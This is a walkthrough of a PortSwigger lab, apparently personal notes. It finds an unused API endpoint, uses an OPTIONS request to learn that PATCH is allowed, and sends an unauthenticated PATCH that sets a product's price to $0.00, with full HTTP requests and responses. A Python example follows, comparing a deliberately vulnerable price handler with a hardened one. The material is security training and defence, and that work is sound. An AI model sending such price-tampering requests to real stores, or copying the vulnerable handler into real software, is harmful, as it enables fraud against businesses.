
PortSwigger: Finding and exploiting an unused API

Finding and exploiting an unused API endpoint

https://portswigger.net/web-security/learning-paths/api-testing/api-testing-identifying-and-interacting-with-api-endpoints/api-testing/lab-exploiting-unused-api-endpoint

Log in to the app

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/my-account?id=wiener

Method: GET

Get info about the product
---
* Request
GET /api/products/1/price HTTP/2
Host: 0ac100e0039a058a81b7981800a600a1.web-security-academy.net
Cookie: session=Zh9RUpHFvshFtu9ykgEqRgY24nxPWZfe
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
---
* Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 91

{"price":"$1337.00","message":"Your neighbor just bought 2 of these! Don't feel left out!"}

Get info about allowed methods

Method: OPTIONS
I see two methods are allowed: GET, PATCH
---
* Request
OPTIONS /api/products/1/price HTTP/2
Host: 0ac100e0039a058a81b7981800a600a1.web-security-academy.net
Cookie: session=Zh9RUpHFvshFtu9ykgEqRgY24nxPWZfe
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
---
* Response
HTTP/2 405 Method Not Allowed
Allow: GET, PATCH
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"

Change price for product

Add two things to the PATCH request:
- Content-Type: application/json
- {"price":0}
---
* Request
PATCH /api/products/1/price HTTP/2
Host: 0ac100e0039a058a81b7981800a600a1.web-security-academy.net
Cookie: session=Zh9RUpHFvshFtu9ykgEqRgY24nxPWZfe
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Length: 11

{"price":0}
---
* Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 17

{"price":"$0.00"}

Verify on website - price: $0.00

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1

Check cart

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/cart

Solved

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/cart/order-confirmation?order-confirmed=true
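What the PATCH step above looks like from the server side, as an added example (not the lab's code, and not PortSwigger's): a minimal in-memory handler for /api/products/{id}/price in the lab's unprotected form next to a hardened one that only lets an admin session change the price and validates the new value. Session names, roles and the products dict are constructed assumptions.

```python
import json
import math

SESSIONS = {  # constructed sample sessions for this example; not the lab's real backend
    "wiener-session": {"user": "wiener", "role": "customer"},
    "admin-session": {"user": "administrator", "role": "admin"},
}
ALLOWED_METHODS = ("GET", "PATCH")

def _session_from(headers):
    """Resolve the session referenced by the Cookie header (None if absent or unknown)."""
    pairs = (kv.split("=", 1) for kv in headers.get("Cookie", "").split("; ") if "=" in kv)
    return SESSIONS.get(dict(pairs).get("session"))

def vulnerable_price_handler(method, headers, body, products, product_id):
    """Mirrors the lab: PATCH is routed and honoured for any session, with no role check."""
    if method == "GET":
        return 200, {"price": f"${products[product_id] / 100:.2f}"}
    if method == "PATCH":
        products[product_id] = int(float(json.loads(body)["price"]) * 100)
        return 200, {"price": f"${products[product_id] / 100:.2f}"}
    return 405, {"error": "Method Not Allowed"}

def hardened_price_handler(method, headers, body, products, product_id):
    """Same route, but PATCH is restricted to admins and the new price is validated."""
    if method not in ALLOWED_METHODS:
        return 405, {"error": "Method Not Allowed"}  # send Allow: GET, PATCH here as well
    if product_id not in products:
        return 404, {"error": "Not found"}
    if method == "GET":
        return 200, {"price": f"${products[product_id] / 100:.2f}"}
    # PATCH: a method the front end never calls still needs full authorisation.
    session = _session_from(headers)
    if session is None:
        return 401, {"error": "Unauthorized"}
    if session["role"] != "admin":
        return 403, {"error": "Forbidden"}
    if headers.get("Content-Type", "").split(";")[0].strip() != "application/json":
        return 415, {"error": "Unsupported Media Type"}
    try:
        price = json.loads(body).get("price")
    except (ValueError, TypeError, AttributeError):
        return 400, {"error": "Malformed JSON"}
    # Reject bools (a bool is an int in Python), non-numbers, NaN/inf and non-positive prices.
    if isinstance(price, bool) or not isinstance(price, (int, float)) \
            or not math.isfinite(price) or price <= 0:
        return 400, {"error": "price must be a positive number"}
    products[product_id] = round(price * 100)
    return 200, {"price": f"${products[product_id] / 100:.2f}"}
```

Prices are held in integer cents so that the formatted output matches the lab's "$1337.00" / "$0.00" strings exactly; the hardened handler turns the lab's {"price":0} request from a customer session into a 403 rather than a 200.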